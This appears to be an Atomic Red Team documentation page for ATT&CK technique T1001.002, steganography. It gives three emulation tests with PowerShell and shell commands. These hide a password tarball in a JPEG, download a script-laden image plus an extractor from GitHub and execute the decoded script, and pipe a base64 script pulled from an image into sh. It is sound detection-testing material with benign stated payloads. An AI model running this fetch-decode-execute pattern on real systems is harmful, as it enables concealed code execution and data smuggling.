Skip to content
Atomic Red Team
atomics
T1001.002

T1001.002 - Data Obfuscation via Steganography

Description from ATT&CK (opens in a new tab)

Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.

Atomic Tests


Atomic Test #1 - Steganographic Tarball Embedding

This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) within an image.

The test begins by ensuring the availability of the image file and the tarball file containing data . It then generates random passwords and saves them to a file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball file within the image, utilizing steganography techniques for data obfuscation.

This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected. By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.

Supported Platforms: Windows

auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b

Inputs:

NameDescriptionTypeDefault Value
image_fileImage file which will be downloaded to be used to hide datapathPathToAtomicsFolder\T1001.002\bin\T1001.002.jpg
tar_fileTarz file containing random passwordspath$env:PUBLIC\Downloads\T1001.002.tarz
new_image_filenew image file ready for extractionpath$env:PUBLIC\Downloads\T1001.002New.jpg
passwords_fileText file containing random passwordspath$env:TEMP\random_passwords.txt

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte

Cleanup Commands:

Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Image file must exist
Check Prereq Commands:
if (!(Test-Path "#{image_file}")) {exit 1} else {
{exit 0}
}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
Write-Output "Downloading image file..."
$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
Description: File to hide within tarz file must exist
Check Prereq Commands:
if (!(Test-Path "#{passwords_file}")) {exit 1} else {
{exit 0}
}
Get Prereq Commands:
Write-Output "Generating random passwords and saving to file..."
$passwords = 1..10 | ForEach-Object { -join ((1..12) | ForEach-Object { @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') + @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') + @('0','1','2','3','4','5','6','7','8','9') + @('!','@','#','$','%','^','&','*','(','(',')','-','=','+','_','[',']','{','}','|',';',';',':',',','<','>','?') | Get-Random }) }
$passwords | Out-File -FilePath "#{passwords_file}"
Description: Tarz file to embed in image must exist
Check Prereq Commands:
if (!(Test-Path "#{tar_file}")) {exit 1} else {
{exit 0}
}
Get Prereq Commands:
Write-Output "Generating tarz file..."
tar -cvf "#{tar_file}" "#{passwords_file}"


Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage

This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file. The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.

The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a separate PowerShell (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.

In the case of this atomic test, the malicious image file which is downloaded has the powershell command Start-Process notepad embedded within in base64. This is done to emulate an attackers behaviour in the case they were to execute malware embedded within the image file.

Supported Platforms: Windows

auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6

Inputs:

NameDescriptionTypeDefault Value
image_fileMalicious Image file which will be downloadedpathPathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg
psimage_scriptExtract-Invoke-PSImage Script downloadedpathPathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

cd "PathToAtomicsFolder\ExternalPayloads\"
Import-Module .\Extract-Invoke-PSImage.ps1
$extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1"
$scriptContent = Get-Content "$HOME\result.ps1" -Raw
$base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])"
$base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value }
$base64Strings | Set-Content "$HOME\decoded.ps1"
$decodedContent = Get-Content "$HOME\decoded.ps1" -Raw
$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))
$textPattern = '^.+'  
$textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value }
$scriptPath = "$HOME\textExtraction.ps1"
$textMatches -join '' | Set-Content -Path $scriptPath
. "$HOME\textExtraction.ps1"

Cleanup Commands:

Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore 
Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Image file must exist
Check Prereq Commands:
if (!(Test-Path "#{image_file}")) {exit 1} else {
{exit 0}
}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
Write-Output "Downloading image file..."
$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
Description: Extract-Invoke-PSImage must exist
Check Prereq Commands:
if (!(Test-Path "#{psimage_script}")) {exit 1} else {
{exit 0}
}
Get Prereq Commands:
New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
$scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}


Atomic Test #3 - Execute Embedded Script in Image via Steganography

This atomic test demonstrates the execution of an embedded script in an image file using steganography techniques. The script is first encoded in base64 and then embedded within the pixels of the image. The modified image is created, and the script is extracted and executed on the target system.

Supported Platforms: Linux

auto_generated_guid: 4ff61684-ad91-405c-9fbc-048354ff1d07

Inputs:

NameDescriptionTypeDefault Value
scriptShell Script file to be embedded and executedStringPathToAtomicsFolder/script.sh
evil_imageThe modified image with embedded scriptStringPathToAtomicsFolder/evil_image.jpg
imageImage file to be embeddedStringPathToAtomicsFolder/image.jpg

Attack Commands: Run with sh!

cat "#{script}" | base64 | xxd -p | sed 's/../& /g' | xargs -n1 | xxd -r -p | cat "#{image}" - > "#{evil_image}"; strings "#{evil_image}" | tail -n 1 | base64 -d | sh

Cleanup Commands:

rm "#{evil_image}"